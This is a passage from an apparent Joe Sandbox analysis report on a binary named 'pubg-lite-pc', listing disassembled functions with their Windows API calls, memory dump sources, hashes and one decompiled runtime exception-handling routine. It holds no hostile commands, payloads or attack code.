                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoLocale$CloseHeapProcess
                                                                                                • String ID: %d-%s
                                                                                                • API String ID: 2000532449-1781338863
                                                                                                • Opcode ID: 93a91a2124285aefa8e5e3cbfcaf022e7efe9d4ea6cefc0acecd03700b8f78fb
                                                                                                • Instruction ID: 4a7439ce40d539be3bb7d09bd9aff7219d4304490cf11de411facd1093e7a820
                                                                                                • Opcode Fuzzy Hash: 93a91a2124285aefa8e5e3cbfcaf022e7efe9d4ea6cefc0acecd03700b8f78fb
                                                                                                • Instruction Fuzzy Hash: 2231BAB1A01215ABEB10DF98DD49BAFBBB8FF54724F10865EF015A7291DB719900CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A61014 Relevance: 6.5, Strings: 4, Instructions: 1455COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                • API String ID: 0-2761157908
                                                                                                • Opcode ID: 57a518a7b6ead33201c90c6a8a2daa6d1c967ed41c54ca07faea8b9be14a23b0
                                                                                                • Instruction ID: a74b15f46b9547a3621c0896b96815e56a9211b8f36b1377c0ef2d546da2b282
                                                                                                • Opcode Fuzzy Hash: 57a518a7b6ead33201c90c6a8a2daa6d1c967ed41c54ca07faea8b9be14a23b0
                                                                                                • Instruction Fuzzy Hash: 8AD23A71E086298FDB65CF28DD407EAB7B5EB85305F1845EAD40EE7240E778AE818F41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0097A530 Relevance: 6.4, APIs: 4, Instructions: 441COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d424d6b457f4c42496f89101769fc87b6f9c9f3a44d906f7dd587120d4948dc3
                                                                                                • Instruction ID: cef40603f85321550c1fa60724ae05e5763cab32b59922d3442abc70182fc3f7
                                                                                                • Opcode Fuzzy Hash: d424d6b457f4c42496f89101769fc87b6f9c9f3a44d906f7dd587120d4948dc3
                                                                                                • Instruction Fuzzy Hash: BF123871D006699FDB25CB64CC44BEDBBB5EF99300F1082A9E949B7290EB705E85CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B2B40 Relevance: 6.3, APIs: 4, Instructions: 321fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 009292F0: GetProcessHeap.KERNEL32 ref: 00929345
                                                                                                • FindFirstFileW.KERNEL32(?,00000000), ref: 009B2C98
                                                                                                • FindFirstFileW.KERNEL32(?,00000000,0000002A,?,00000000), ref: 009B2D35
                                                                                                • FindClose.KERNEL32(00000000,?,00000000), ref: 009B2D5B
                                                                                                • FindClose.KERNEL32(00000000,?,00000000), ref: 009B2DA5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst$HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 2028800921-0
                                                                                                • Opcode ID: 4e49f2b10ab1fa6621cb43a98c27d9c64d1746dfaba3aca5708ffc9cd857c543
                                                                                                • Instruction ID: fa695e9c90ba376abab5cc209a14afcc88f4e8f79502d4dcb0ad711b5a7d38a5
                                                                                                • Opcode Fuzzy Hash: 4e49f2b10ab1fa6621cb43a98c27d9c64d1746dfaba3aca5708ffc9cd857c543
                                                                                                • Instruction Fuzzy Hash: 48A1D171A002059FDB10DF68CE49BEEB7F8FF94324F14866EE825972C1EB7599048B90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CF3B0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b8e0d33ad7396961a1940120dbb4903497bf9440c15b3c4cbc96d203cc9a3aca
                                                                                                • Instruction ID: b915299f8a7488c3830a77a15968951141c88f449c5a8aec9854c7b1ead5305c
                                                                                                • Opcode Fuzzy Hash: b8e0d33ad7396961a1940120dbb4903497bf9440c15b3c4cbc96d203cc9a3aca
                                                                                                • Instruction Fuzzy Hash: A581E070D005498BCF24CFA8C9A8FADB7B6EF49324F18863DE825D72A1D7349945CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009DA750 Relevance: 6.2, APIs: 4, Instructions: 211COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 494a3e5ba88a16c1f8b35885c06c4d0aaf61fd46887d7ab3218b175683f7038d
                                                                                                • Instruction ID: 850f4574203e5f173a2f88af0c1455087ac81a7541759d3f972c9bd280fe0100
                                                                                                • Opcode Fuzzy Hash: 494a3e5ba88a16c1f8b35885c06c4d0aaf61fd46887d7ab3218b175683f7038d
                                                                                                • Instruction Fuzzy Hash: 8881AF71901218DFDB50DF68CD89B99BBB8EF45310F1482DAE419AB392DB709E44CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00950F70 Relevance: 6.1, APIs: 4, Instructions: 147COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowRect.USER32(?,?), ref: 00951030
                                                                                                • GetWindowRect.USER32(?,?), ref: 00951048
                                                                                                • GetWindowRect.USER32(?,?), ref: 009510B5
                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 009510DC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Rect$Long
                                                                                                • String ID:
                                                                                                • API String ID: 3486571012-0
                                                                                                • Opcode ID: fd956bb9962b2cfcabdefbf2496b310e0e0e82a02ded8c318c29c52bdebbcb90
                                                                                                • Instruction ID: 45cf7ff14499a815a38d41c0d005a20baf39a60762764c803f72b9d7d46639ca
                                                                                                • Opcode Fuzzy Hash: fd956bb9962b2cfcabdefbf2496b310e0e0e82a02ded8c318c29c52bdebbcb90
                                                                                                • Instruction Fuzzy Hash: DF518B326083059FC710CF66D980E6BB7E9FF99701F454A2EF94597250EB30E949CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009793D0 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetWindowLongW.USER32(00000000,000000FC), ref: 00979450
                                                                                                • SetWindowLongW.USER32(00000000,000000FC,?), ref: 00979468
                                                                                                • GetWindowLongW.USER32(00000000,000000FC), ref: 009794A0
                                                                                                • SetWindowLongW.USER32(00000000,000000FC,?), ref: 009794B8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: LongWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1378638983-0
                                                                                                • Opcode ID: 9e3c7cc2d5064cf3507df3b9188564f1c9c2da054645b78b1f157ceabf688cd5
                                                                                                • Instruction ID: f10263244287b30575e805ec0194365f06ffcb78d2dfdf11e53d4f3aaf6334f3
                                                                                                • Opcode Fuzzy Hash: 9e3c7cc2d5064cf3507df3b9188564f1c9c2da054645b78b1f157ceabf688cd5
                                                                                                • Instruction Fuzzy Hash: EB418F71A04656EFCB05DFB8C948BDAFFB8FB15314F148359E428A3292DB746A14CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D98AEBD Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E6D98AEBD(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6D98AFD8(_t34);
				 *_t60 = 0x2cc;
				_v632 = L6D98C450(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				L6D98C450(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6D98AFD8(_t49);
				}
				return _t49;
			}


































                                                                                                0x6d98aebd
                                                                                                0x6d98aebd
                                                                                                0x6d98aebd
                                                                                                0x6d98aed1
                                                                                                0x6d98aed3
                                                                                                0x6d98aed6
                                                                                                0x6d98aed6
                                                                                                0x6d98aeda
                                                                                                0x6d98aedf
                                                                                                0x6d98aef7
                                                                                                0x6d98aefd
                                                                                                0x6d98af03
                                                                                                0x6d98af09
                                                                                                0x6d98af0f
                                                                                                0x6d98af15
                                                                                                0x6d98af1b
                                                                                                0x6d98af22
                                                                                                0x6d98af29
                                                                                                0x6d98af30
                                                                                                0x6d98af37
                                                                                                0x6d98af3e
                                                                                                0x6d98af45
                                                                                                0x6d98af46
                                                                                                0x6d98af4f
                                                                                                0x6d98af55
                                                                                                0x6d98af58
                                                                                                0x6d98af5e
                                                                                                0x6d98af6d
                                                                                                0x6d98af79
                                                                                                0x6d98af84
                                                                                                0x6d98af8b
                                                                                                0x6d98af92
                                                                                                0x6d98af9d
                                                                                                0x6d98afa5
                                                                                                0x6d98afae
                                                                                                0x6d98afb0
                                                                                                0x6d98afb3
                                                                                                0x6d98afb5
                                                                                                0x6d98afbf
                                                                                                0x6d98afc7
                                                                                                0x6d98afcd
                                                                                                0x00000000
                                                                                                0x6d98afd4
                                                                                                0x6d98afd7

                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6D98AEC9
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6D98AF95
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D98AFB5
                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6D98AFBF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 254469556-0
                                                                                                • Opcode ID: f0bd4b9d059471e832ee9f2737df46e943c2588892cbb2d326bef6244c2181ef
                                                                                                • Instruction ID: 2c1da1feb6547059cbc1c63913dc551605115a35208e072616b3fc45372256cf
                                                                                                • Opcode Fuzzy Hash: f0bd4b9d059471e832ee9f2737df46e943c2588892cbb2d326bef6244c2181ef
                                                                                                • Instruction Fuzzy Hash: 383129B5D0931C9BDB11DF64C989BCDBBB8AF08704F10419AE409A7280EB709A848F45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A467B6 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A467C8
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A467D7
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00A467E0
                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00A467ED
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                • String ID:
                                                                                                • API String ID: 2933794660-0
                                                                                                • Opcode ID: 9c88f85b9947a7da3d45cb7a61ee9522cbd203096a468433013cc0906a03c067
                                                                                                • Instruction ID: 233f86e2eacd32c8aa4480d750b4be27249631a845e7c72f114723a9b864182d
                                                                                                • Opcode Fuzzy Hash: 9c88f85b9947a7da3d45cb7a61ee9522cbd203096a468433013cc0906a03c067
                                                                                                • Instruction Fuzzy Hash: C1F09D70D11208EBCF00DBF0D949A9EBBB8EF08205F514896D402E6151DB74AB058F61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A45B37 Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A45C57,00A9FE7C), ref: 00A45B3C
                                                                                                • UnhandledExceptionFilter.KERNEL32(00A45C57,?,00A45C57,00A9FE7C), ref: 00A45B45
                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,00A45C57,00A9FE7C), ref: 00A45B50
                                                                                                • TerminateProcess.KERNEL32(00000000,?,00A45C57,00A9FE7C), ref: 00A45B57
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 3231755760-0
                                                                                                • Opcode ID: faabffe8acbe910b15bbf46cc181ad513bbd5923a9f398f69d77a11cdea4f311
                                                                                                • Instruction ID: 0e0aee07821c339feca5d8ec749847efec63038ee27d9adefeb09856e9c1b634
                                                                                                • Opcode Fuzzy Hash: faabffe8acbe910b15bbf46cc181ad513bbd5923a9f398f69d77a11cdea4f311
                                                                                                • Instruction Fuzzy Hash: C1D01231200104EBDB00EBE5EC0DE5D3F6CFB08302F084902F30981132DF3154028B51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009DAB50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,00000000,?), ref: 009DAC0C
                                                                                                • FindClose.KERNEL32(00000000), ref: 009DAD57
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$AllocateCloseFileFirstHeap
                                                                                                • String ID: %d.%d.%d.%d
                                                                                                • API String ID: 1673784098-3491811756
                                                                                                • Opcode ID: 41d3abbf5b8f4bd655744dd5c252d6d0ade03cd1c5a090bda9186645688b5535
                                                                                                • Instruction ID: c24be7b3b131b424ec5c8907ff43404b914b49a570616e96dca0deb8f9e586e8
                                                                                                • Opcode Fuzzy Hash: 41d3abbf5b8f4bd655744dd5c252d6d0ade03cd1c5a090bda9186645688b5535
                                                                                                • Instruction Fuzzy Hash: EC618C70905219DFDB20DF68CD48B9DBBB9EF44314F10829AE419AB391DB359E84CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0093BF10 Relevance: 5.3, Strings: 4, Instructions: 342COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID: AI_CONTROL_VISUAL_STYLE$AI_CONTROL_VISUAL_STYLE_EX$AI_NO_BORDER_HOVER$AI_NO_BORDER_NORMAL
                                                                                                • API String ID: 2962429428-932585912
                                                                                                • Opcode ID: 802484d097d98ceae91a892557a1239fd0a7cf80d21b9e3e1138c4dc2015d625
                                                                                                • Instruction ID: 75efe1779e349efca29eda468c39b074138da2a53e374214169652eb4034d422
                                                                                                • Opcode Fuzzy Hash: 802484d097d98ceae91a892557a1239fd0a7cf80d21b9e3e1138c4dc2015d625
                                                                                                • Instruction Fuzzy Hash: 76D1C2B0D04268DFEB04CFA8CD45BADBBB1FF85304F508159E455AB286D778AA05CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A42B50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VirtualQuery.KERNEL32(80000000,00A42A98,0000001C,00A42C8A,00000000,?,?,?,?,?,?,?,00A42A98,00000004,00B0243C,00A42D1A), ref: 00A42B61
                                                                                                • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00A42A98,00000004,00B0243C,00A42D1A), ref: 00A42B7C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
